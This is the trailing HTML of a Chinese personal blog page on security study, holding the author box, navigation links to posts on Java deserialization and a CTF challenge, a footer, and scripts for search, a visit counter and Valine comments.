        <a href="https://github.com/vvmdx/vvmdx.github.io" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/vvmdx/vvmdx.github.io" target="_blank"><span class="text-dark">无名大仙</span><small class="ml-1x">学习记录 &amp; 笔记分享</small></a></h3>
        <div>希望在有限的时间里学有所成！</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2021/08/13/2021-08-13-java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9F%BA%E7%A1%80/" title="java反序列化基础"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;上一篇</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2021/06/18/2021-06-18-CISCN_2019_s_9/" title="CISCN_2019_s_9"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
    <li class="toggle-toc">
      <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false" title="文章目录" role="button">
        <span>[&nbsp;</span><span>文章目录</span>
        <i class="text-collapsed icon icon-anchor"></i>
        <i class="text-in icon icon-close"></i>
        <span>]</span>
      </a>
    </li>
    
  </ul>
  
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/vvmdx/vvmdx.github.io" target="_blank" title="Github" ><i class="icon icon-github"></i></a></li>
        
    </ul>

    
		<span class="article-read hidden-xs">
			<i class="icon icon-eye-fill" aria-hidden="true">
				<a style="font-size: 13px;">
				总阅读量：
				</a>
			</i>
			<span id="busuanzi_container_page_pv">
				<span id="busuanzi_value_page_pv">0</span>
			</span>
		</span>
	
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: 'sxsgeGDaI22uOW483iJnK8ok-gzGzoHsz',
    appKey: 'dj90VMpUaL25ueRxXvaR0phd',
    placeholder: '来说点什么吧~ (填写邮箱以便快速收到回复~)',
    avatar: 'monsterid',
    meta: meta,
    pageSize: '10' || 10,
    visitor: true
  });
  </script>

     







</body>
</html>